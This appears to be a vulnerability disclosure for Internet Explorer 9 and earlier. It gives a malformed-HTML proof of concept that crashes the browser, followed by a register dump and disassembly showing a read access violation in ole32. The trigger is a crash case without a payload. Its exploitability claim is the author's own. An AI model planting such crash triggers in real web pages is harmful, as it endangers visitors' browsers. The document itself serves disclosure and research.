---------------------------------------------------------------------- Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability ---------------------------------------------------------------------- Author: Jean Pascal Pereira <pereira@secbiz.de> Vendor: Microsoft Internet Explorer 9.x and below Description: The application is prone to a remote stack overflow vulnerability. Successful exploitation may lead to arbitrary code execution. ---------------------------------------------------------------------- Proof Of Concept: ---------------------------------------------------------------------- <table></for xmlns="1"> <td><datetime><colgroup> <id><dd><col> </table><object> <hr><base> ---------------------------------------------------------------------- Register Dump: ---------------------------------------------------------------------- EAX 800706BE ECX 763FCDB3 RPCRT4.763FCDB3 EDX 00000000 EBX 0604393C ESP 003FDDD4 EBP 003FDDE0 ESI 003FDE30 EDI 761AFA10 ole32.761AFA10 EIP 7629CF51 ole32.7629CF51 ---------------------------------------------------------------------- Crash Instruction: ---------------------------------------------------------------------- 7629CF36 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 7629CF39 24 04 AND AL,4 7629CF3B 0FB6C0 MOVZX EAX,AL 7629CF3E F7D8 NEG EAX 7629CF40 1BC0 SBB EAX,EAX 7629CF42 25 0A010180 AND EAX,8001010A 7629CF47 8901 MOV DWORD PTR DS:[ECX],EAX 7629CF49 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18] 7629CF4C 50 PUSH EAX 7629CF4D 53 PUSH EBX 7629CF4E 8975 D8 MOV DWORD PTR SS:[EBP-28],ESI 7629CF51 FF70 5C PUSH DWORD PTR DS:[EAX+5C] ---------------------------------------------------------------------- At 0x7629CF51, a read access violation occurs. ---------------------------------------------------------------------- Jean Pascal Pereira <pereira@secbiz.de> || http://www.0xffe4.org